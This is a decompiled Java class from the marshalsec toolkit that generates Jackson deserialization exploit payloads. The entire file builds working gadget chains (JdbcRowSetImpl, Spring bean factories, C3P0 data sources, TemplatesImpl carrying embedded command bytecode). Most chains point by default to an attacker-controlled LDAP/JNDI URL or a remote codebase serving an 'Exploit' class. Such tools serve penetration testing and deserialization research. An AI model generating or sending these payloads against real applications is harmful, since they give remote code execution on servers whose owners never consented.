/*
 * Decompiled with CFR 0.152.
 */
package marshalsec;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import com.sun.rowset.JdbcRowSetImpl;
import java.util.Base64;
import java.util.Collections;
import java.util.HashSet;
import java.util.LinkedHashMap;
import java.util.Map;
import marshalsec.MarshallerBase;
import marshalsec.UtilFactory;
import marshalsec.gadgets.Args;
import marshalsec.gadgets.C3P0RefDataSource;
import marshalsec.gadgets.C3P0WrapperConnPool;
import marshalsec.gadgets.JdbcRowSet;
import marshalsec.gadgets.SpringAbstractBeanFactoryPointcutAdvisor;
import marshalsec.gadgets.SpringPropertyPathFactory;
import marshalsec.gadgets.Templates;
import marshalsec.gadgets.TemplatesUtil;
import marshalsec.gadgets.UnicastRemoteObjectGadget;
import marshalsec.util.Reflections;
import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor;
import org.springframework.beans.factory.config.PropertyPathFactoryBean;
import org.springframework.jndi.support.SimpleJndiBeanFactory;

public class Jackson
extends MarshallerBase<String>
implements JdbcRowSet,
SpringPropertyPathFactory,
SpringAbstractBeanFactoryPointcutAdvisor,
C3P0RefDataSource,
C3P0WrapperConnPool,
UnicastRemoteObjectGadget,
Templates {
    @Override
    public String marshal(Object o) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        return mapper.writeValueAsString(o);
    }

    @Override
    public Object unmarshal(String data) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        return mapper.readValue(data, Object.class);
    }

    @Override
    @Args(minArgs=1, args={"jndiUrl"}, defaultArgs={"{exploit.jndiUrl:ldap://localhost:1389/obj}"}, noTest=true)
    public Object makeJdbcRowSet(UtilFactory uf, String[] args) throws Exception {
        LinkedHashMap<String, String> values = new LinkedHashMap<String, String>();
        values.put("dataSourceName", Jackson.quoteString(args[0]));
        values.put("autoCommit", "true");
        return Jackson.writeObject(JdbcRowSetImpl.class, values);
    }

    @Override
    @Args(minArgs=1, args={"jndiUrl"}, defaultArgs={"{exploit.jndiUrl:ldap://localhost:1389/obj}"})
    public Object makePropertyPathFactory(UtilFactory uf, String[] args) throws Exception {
        LinkedHashMap<String, String> values = new LinkedHashMap<String, String>();
        String jndiUrl = args[0];
        values.put("targetBeanName", Jackson.quoteString(jndiUrl));
        values.put("propertyPath", Jackson.quoteString("foo"));
        values.put("beanFactory", Jackson.makeSpringJndiBeanFactory(jndiUrl));
        return Jackson.writeObject(PropertyPathFactoryBean.class, values);
    }

    @Override
    @Args(minArgs=1, args={"jndiUrl"}, defaultArgs={"{exploit.jndiUrl:ldap://localhost:1389/obj}"})
    public Object makeBeanFactoryPointcutAdvisor(UtilFactory uf, String[] args) throws Exception {
        String jndiUrl = args[0];
        LinkedHashMap<String, String> values = new LinkedHashMap<String, String>();
        values.put("beanFactory", Jackson.makeSpringJndiBeanFactory(jndiUrl));
        values.put("adviceBeanName", Jackson.quoteString(jndiUrl));
        return Jackson.writeCollection(HashSet.class.getName(), Jackson.writeObject(DefaultBeanFactoryPointcutAdvisor.class, values), Jackson.writeObject(DefaultBeanFactoryPointcutAdvisor.class, (Map<String, String>)Collections.EMPTY_MAP));
    }

    private static String makeSpringJndiBeanFactory(String jndiUrl) {
        return Jackson.writeObject(SimpleJndiBeanFactory.class, Collections.singletonMap("shareableResources", Jackson.writeArray(Jackson.quoteString(jndiUrl))));
    }

    @Override
    @Args(minArgs=1, args={"jndiUrl"}, defaultArgs={"{exploit.jndiUrl:ldap://localhost:1389/obj}"})
    public Object makeRefDataSource(UtilFactory uf, String[] args) throws Exception {
        LinkedHashMap<String, String> values = new LinkedHashMap<String, String>();
        values.put("jndiName", Jackson.quoteString(args[0]));
        values.put("loginTimeout", "0");
        return Jackson.writeObject("com.mchange.v2.c3p0.JndiRefForwardingDataSource", values);
    }

    @Override
    @Args(minArgs=2, args={"codebase", "class"}, defaultArgs={"{exploit.codebase:http://localhost:8080/}", "{exploit.codebaseClass:Exploit}"})
    public Object makeWrapperConnPool(UtilFactory uf, String[] args) throws Exception {
        return Jackson.writeObject(WrapperConnectionPoolDataSource.class, Collections.singletonMap("userOverridesAsString", Jackson.quoteString(C3P0WrapperConnPool.makeC3P0UserOverridesString(args[0], args[1]))));
    }

    @Override
    @Args(minArgs=0, args={}, noTest=true)
    public Object makeUnicastRemoteObject(UtilFactory uf, String ... args) throws Exception {
        return Jackson.writeObject("java.rmi.server.UnicastRemoteObject", (Map<String, String>)Collections.EMPTY_MAP);
    }

    @Override
    @Args(minArgs=1, args={"cmd", "args..."}, defaultArgs={"{exploit.exec:/usr/bin/gedit}"}, noTest=true)
    public Object makeTemplates(UtilFactory uf, String ... args) throws Exception {
        Object tpl = TemplatesUtil.createTemplatesImpl(args);
        byte[][] bytecodes = (byte[][])Reflections.getFieldValue(tpl, "_bytecodes");
        LinkedHashMap<String, String> values = new LinkedHashMap<String, String>();
        String base64 = Base64.getEncoder().encodeToString(bytecodes[0]);
        values.put("transletBytecodes", Jackson.writeArray(Jackson.quoteString(base64)));
        values.put("transletName", Jackson.quoteString("foo"));
        values.put("outputProperties", "{}");
        if (Boolean.parseBoolean(System.getProperty("upstreamXalan", "false"))) {
            return Jackson.writeObject("org.apache.xalan.xsltc.trax.TemplatesImpl", values);
        }
        return Jackson.writeObject("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", values);
    }

    private static String writeArray(String ... elements) {
        StringBuilder sb = new StringBuilder();
        sb.append('[');
        boolean first = true;
        for (String elem : elements) {
            if (!first) {
                sb.append(',');
            } else {
                first = false;
            }
            sb.append(elem);
        }
        sb.append(']');
        return sb.toString();
    }

    private static String quoteString(String string) {
        return '\"' + string + '\"';
    }

    private static String writeCollection(String type, String ... values) {
        StringBuilder sb = new StringBuilder();
        sb.append('[');
        sb.append('\"').append(type).append('\"');
        sb.append(',');
        sb.append('[');
        boolean first = true;
        for (String val : values) {
            if (!first) {
                sb.append(',');
            } else {
                first = false;
            }
            sb.append(val);
        }
        sb.append(']');
        sb.append(']');
        return sb.toString();
    }

    private static String writeObject(Class<?> clazz, Map<String, String> values) {
        return Jackson.writeObject(clazz.getName(), values);
    }

    private static String writeObject(String type, Map<String, String> properties) {
        StringBuilder sb = new StringBuilder();
        sb.append('[');
        sb.append('\"').append(type).append('\"');
        sb.append(',');
        sb.append('{');
        boolean first = true;
        for (Map.Entry<String, String> e : properties.entrySet()) {
            if (!first) {
                sb.append(',');
            } else {
                first = false;
            }
            Jackson.writeProperty(sb, e.getKey(), e.getValue());
        }
        sb.append('}');
        sb.append(']');
        return sb.toString();
    }

    private static void writeProperty(StringBuilder sb, String key, String value) {
        sb.append('\"').append(key).append('\"');
        sb.append(':');
        sb.append(value);
    }

    public static void main(String[] args) {
        new Jackson().run(args);
    }
}

